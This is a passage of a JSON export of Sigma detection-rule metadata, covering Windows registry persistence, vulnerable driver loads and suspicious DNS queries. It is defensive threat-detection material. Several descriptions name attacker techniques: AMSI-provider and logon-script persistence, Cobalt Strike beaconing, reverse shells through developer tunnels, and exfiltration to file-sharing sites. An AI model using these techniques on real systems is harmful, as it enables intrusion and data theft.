"dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9b0f8a61-91b2-464f-aceb-0527e0a45020", "value": 
"Potential COM Object Hijacking Via TreatAs Subkey - Registry" }, { "description": "Detects the execution of a Sysinternals Tool via the creation of the \"accepteula\" registry key", "meta": { "author": "Markus Neis", "creation_date": "2017-08-28", "falsepositive": [ "Legitimate use of SysInternals tools", "Programs that use the same Registry Key" ], "filename": "registry_add_pua_sysinternals_execution_via_eula.yml", "level": "low", "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ "https://twitter.com/Moti_B/status/1008587936735035392", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml" ], "tags": [ "attack.resource-development", "attack.t1588.002" ] }, "related": [ { "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "25ffa65d-76d8-4da5-a832-3f2b0136e133", "value": "PUA - Sysinternal Tool Execution - Registry" }, { "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Legitimate security products adding their own AMSI providers. 
Filter these according to your environment" ], "filename": "registry_add_persistence_amsi_providers.yml", "level": "high", "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c", "https://persistence-info.github.io/Data/amsi.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_amsi_providers.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "value": "Potential Persistence Via New AMSI Providers - Registry" }, { "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Legitimate new entry added by windows" ], "filename": "registry_add_persistence_disk_cleanup_handler_entry.yml", "level": "medium", "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/diskcleanuphandler.html", "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", "value": "Potential Persistence Via Disk Cleanup Handler - Registry" }, { "description": "Detects creation of \"UserInitMprLogonScript\" registry value which can be used as a persistence method by malicious actors", "meta": { "author": "Tom Ueltschi (@c_APT_ure)", "creation_date": "2019-01-12", "falsepositive": [ "Investigate the contents of the \"UserInitMprLogonScript\" value to determine of the added script is legitimate" ], "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml", "level": "medium", "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" ], "tags": [ "attack.t1037.001", "attack.persistence", "attack.lateral-movement" ] }, "related": [ { "dest-uuid": "eb125d40-0b2d-41ac-a71a-3229241c2cd3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9ace0707-b560-49b8-b6ca-5148b42f39fb", "value": "Potential Persistence Via Logon Scripts - Registry" }, { "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-07-26", "falsepositive": [ "Unknown" ], "filename": "driver_load_win_vuln_winring0_driver.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://github.com/xmrig/xmrig/tree/master/bin/WinRing0", 
"https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a42dfa6-6cb2-4df9-9b48-295be477e835", "value": "Vulnerable WinRing0 Driver Load" }, { "description": "Detects a driver load from a temporary directory", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-02-12", "falsepositive": [ "There is a relevant set of false positives depending on applications in the environment" ], "filename": "driver_load_win_susp_temp_use.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_susp_temp_use.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", "value": "Driver Load From A Temporary Directory" }, { "description": "Detects driver load of the Process Hacker tool", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-11-16", "falsepositive": [ "Legitimate use of process hacker or system informer by developers or system administrators" ], "filename": "driver_load_win_pua_process_hacker.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://processhacker.sourceforge.io/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_pua_process_hacker.yml" ], "tags": [ "attack.privilege-escalation", "cve.2021-21551", "attack.t1543" ] }, "related": [ { "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "67add051-9ee7-4ad3-93ba-42935615ae8d", "value": "PUA - Process Hacker Driver Load" }, { "description": "Detects driver load of the System Informer tool", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2023-05-08", "falsepositive": [ "System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly" ], "filename": "driver_load_win_pua_system_informer.yml", "level": "medium", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://systeminformer.sourceforge.io/", "https://github.com/winsiderss/systeminformer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_pua_system_informer.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543" ] }, "related": [ { "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "10cb6535-b31d-4512-9962-513dcbc42cc1", "value": "PUA - System Informer Driver Load" }, { "description": "Detects loading of known malicious drivers via the file name of the drivers.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-03", "falsepositive": [ "False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. 
So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", "If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)" ], "filename": "driver_load_win_mal_drivers_names.yml", "level": "medium", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://loldrivers.io/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_mal_drivers_names.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543.003", "attack.t1068" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "39b64854-5497-4b57-a448-40977b8c9679", "value": "Malicious Driver Load By Name" }, { "description": "Detects loading of known vulnerable drivers via their hash.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-18", "falsepositive": [ "Unknown" ], "filename": "driver_load_win_vuln_drivers.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://loldrivers.io/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543.003", "attack.t1068" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", "value": "Vulnerable Driver Load" }, 
{ "description": "Detects the load of known vulnerable drivers via the file name of the drivers.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-03", "falsepositive": [ "False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", "If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)" ], "filename": "driver_load_win_vuln_drivers_names.yml", "level": "low", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://loldrivers.io/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543.003", "attack.t1068" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "72cd00d6-490c-4650-86ff-1d11f491daa1", "value": "Vulnerable Driver Load By Name" }, { "description": "Detects loading of known malicious drivers via their hash.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-18", "falsepositive": [ "Unknown" ], "filename": "driver_load_win_mal_drivers.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://loldrivers.io/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_mal_drivers.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543.003", "attack.t1068" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "05296024-fe8a-4baf-8f3d-9a5f5624ceb2", "value": "Malicious Driver Load" }, { "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-18", "falsepositive": [ "Unlikely" ], "filename": "driver_load_win_vuln_hevd_driver.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://github.com/hacksysteam/HackSysExtremeVulnerableDriver", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_hevd_driver.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "295c9289-acee-4503-a571-8eacaef36b28", "value": "Vulnerable HackSys Extreme Vulnerable Driver Load" }, { "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-07-30", "falsepositive": [ "Legitimate WinDivert driver usage" ], "filename": "driver_load_win_windivert.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://reqrypt.org/windivert-doc.html", "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_windivert.yml" ], "tags": [ "attack.collection", "attack.defense-evasion", "attack.t1599.001", "attack.t1557.001" ] }, "related": [ { "dest-uuid": "4ffc1794-ec3b-45be-9e52-42dbcb2af2de", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "679085d5-f427-4484-9f58-1dc30a7c426d", "value": "WinDivert Driver Load" }, { "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-11-09", "falsepositive": [ "Unknown" ], "filename": "dns_query_win_mal_cobaltstrike.yml", "level": "critical", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.004" ] }, "related": [ { "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f356a9c4-effd-4608-bbf8-408afd5cd006", "value": "Suspicious Cobalt Strike DNS Beaconing - Sysmon" }, { "description": "Detects DNS requests to Cloudflared tunnels domains.\nAttackers can abuse that feature to establish a reverse shell or persistence on a machine.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-12-20", "falsepositive": [ "Legitimate use of cloudflare tunnels will also trigger this." 
], "filename": "dns_query_win_cloudflared_communication.yml", "level": "medium", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_cloudflared_communication.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a1d9eec5-33b2-4177-8d24-27fe754d0812", "value": "Cloudflared Tunnels Related DNS Requests" }, { "description": "Detects a DNS query by a non browser process on the system to \"azurewebsites.net\". The latter was often used by threat actors as a malware hosting and exfiltration site.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-06-24", "falsepositive": [ "Likely with other browser software. Apply additional filters for any other browsers you might use." 
], "filename": "dns_query_win_domain_azurewebsites.yml", "level": "medium", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia", "https://intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/", "https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_domain_azurewebsites.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e043f529-8514-4205-8ab0-7f7d2927b400", "value": "DNS Query To AzureWebsites.NET By Non-Browser Process" }, { "description": "Detects DNS queries made by \"AppInstaller.EXE\". The AppInstaller is the default handler for the \"ms-appinstaller\" URI. 
It attempts to load/install a package from the referenced URL\n", "meta": { "author": "frack113", "creation_date": "2021-11-24", "falsepositive": [ "Unknown" ], "filename": "dns_query_win_appinstaller.yml", "level": "medium", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", "https://twitter.com/notwhickey/status/1333900137232523264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_appinstaller.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", "value": "AppX Package Installation Attempts Via AppInstaller.EXE" }, { "description": "Detects DNS queries for IP lookup services such as \"api.ipify.org\" originating from a non browser process.", "meta": { "author": "Brandon George (blog post), Thomas Patzke", "creation_date": "2021-07-08", "falsepositive": [ "Legitimate usage of IP lookup services such as ipify API" ], "filename": "dns_query_win_susp_external_ip_lookup.yml", "level": "medium", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", "https://twitter.com/neonprimetime/status/1436376497980428318", "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_external_ip_lookup.yml" ], "tags": [ "attack.reconnaissance", "attack.t1590" ] }, "related": [ { "dest-uuid": "9d48cab2-7929-4812-ad22-f536665f0109", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", 
"value": "Suspicious DNS Query for IP Lookup Service APIs" }, { "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-30", "falsepositive": [ "Unknown binary names of TeamViewer", "Depending on the environment the rule might require some initial tuning before usage to avoid FP with third party applications" ], "filename": "dns_query_win_teamviewer_domain_query_by_uncommon_app.yml", "level": "medium", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://www.teamviewer.com/en-us/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_teamviewer_domain_query_by_uncommon_app.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", "value": "TeamViewer Domain Query By Non-TeamViewer Application" }, { "description": "Detects DNS server discovery via LDAP query requests from uncommon applications", "meta": { "author": "frack113", "creation_date": "2022-08-20", "falsepositive": [ "Likely" ], "filename": "dns_query_win_dns_server_discovery_via_ldap_query.yml", "level": "low", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/980f3f83fd81f37c1ca9c02dccfd1c3d9f9d0841/atomics/T1016/T1016.md#atomic-test-9---dns-server-discovery-using-nslookup", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/7fcdce70-5205-44d6-9c3a-260e616a2f04", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml" ], "tags": [ 
"attack.discovery", "attack.t1482" ] }, "related": [ { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", "value": "DNS Server Discovery Via LDAP Query" }, { "description": "Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\n", "meta": { "author": "citron_ninja", "creation_date": "2023-10-25", "falsepositive": [ "Legitimate use of Devtunnels will also trigger this." ], "filename": "dns_query_win_devtunnels_communication.yml", "level": "medium", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2", "https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security", "https://cydefops.com/devtunnels-unleashed", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_devtunnels_communication.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b", "value": "DNS Query To Devtunnels Domain" }, { "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2021-04-12", "falsepositive": [ "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" ], "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml", "level": "high", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml" ], "tags": [ "attack.persistence", "attack.t1554" ] }, "related": [ { "dest-uuid": "960c3c86-1480-4d72-b4e0-8c242e84a5c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "value": "DNS HybridConnectionManager Service Bus" }, { "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", "meta": { "author": "frack113", "creation_date": "2022-02-20", "falsepositive": [ "Unknown" ], "filename": "dns_query_win_tor_onion_domain_query.yml", "level": "high", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_tor_onion_domain_query.yml" ], "tags": [ "attack.command-and-control", "attack.t1090.003" ] }, "related": [ { "dest-uuid": "a782ebe2-daba-42c7-bc82-e8e9d923162d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", "value": "DNS Query Tor .Onion Address - Sysmon" }, { "description": "Detects DNS queries to \"ufile.io\", which was seen abused by malware and threat actors as a method for data exfiltration", "meta": { "author": "yatinwad, TheDFIRReport", "creation_date": "2022-06-23", "falsepositive": [ "DNS queries for \"ufile\" are not malicious by nature necessarily. 
Investigate the source to determine the necessary actions to take" ], "filename": "dns_query_win_ufile_io_query.yml", "level": "low", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_ufile_io_query.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.002" ] }, "related": [ { "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", "value": "DNS Query To Ufile.io" }, { "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2022-07-15", "falsepositive": [ "Rare legitimate access to anonfiles.com" ], "filename": "dns_query_win_anonymfiles_com.yml", "level": "high", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.002" ] }, "related": [ { "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "065cceea-77ec-4030-9052-fc0affea7110", "value": "DNS Query for Anonfiles.com Domain - Sysmon" }, { "description": "Detects DNS queries for subdomains related to MEGA sharing website", "meta": { "author": "Aaron Greetham (@beardofbinary) - NCC Group", "creation_date": "2021-05-26", "falsepositive": [ "Legitimate DNS queries and usage of Mega" ], "filename": "dns_query_win_mega_nz.yml", "level": "medium", "logsource.category": 
"dns_query", "logsource.product": "windows", "refs": [ "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mega_nz.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.002" ] }, "related": [ { "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "613c03ba-0779-4a53-8a1f-47f914a4ded3", "value": "DNS Query To MEGA Hosting Website" }, { "description": "Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\n", "meta": { "author": "citron_ninja", "creation_date": "2023-10-25", "falsepositive": [ "Legitimate use of Visual Studio Code tunnel will also trigger this." ], "filename": "dns_query_win_vscode_tunnel_communication.yml", "level": "medium", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://cydefops.com/vscode-data-exfiltration", "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://ipfyx.fr/post/visual-studio-code-tunnel/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_vscode_tunnel_communication.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b3e6418f-7c7a-4fad-993a-93b65027a9f1", "value": "DNS Query To Visual Studio Code Tunnels Domain" }, { "description": "Detects DNS query requests to \"update.onelaunch.com\". 
This domain is associated with the OneLaunch adware application.\nWhen the OneLaunch application is installed it will attempt to get updates from this domain.\n", "meta": { "author": "Josh Nickels", "creation_date": "2024-02-26", "falsepositive": [ "Unlikely" ], "filename": "dns_query_win_onelaunch_update_service.yml", "level": "low", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://www.myantispyware.com/2020/12/14/how-to-uninstall-onelaunch-browser-removal-guide/", "https://malware.guide/browser-hijacker/remove-onelaunch-virus/", "https://www.malwarebytes.com/blog/detections/pup-optional-onelaunch-silentcf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_onelaunch_update_service.yml" ], "tags": [ "attack.collection", "attack.t1056" ] }, "related": [ { "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "df68f791-ad95-447f-a271-640a0dab9cf8", "value": "DNS Query Request To OneLaunch Update Service" }, { "description": "Detects DNS queries initiated by \"Regsvr32.exe\"", "meta": { "author": "Dmitriy Lifanov, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Unknown" ], "filename": "dns_query_win_regsvr32_dns_query.yml", "level": "medium", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_regsvr32_dns_query.yml" ], "tags": [ "attack.execution", "attack.t1559.001", "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": 
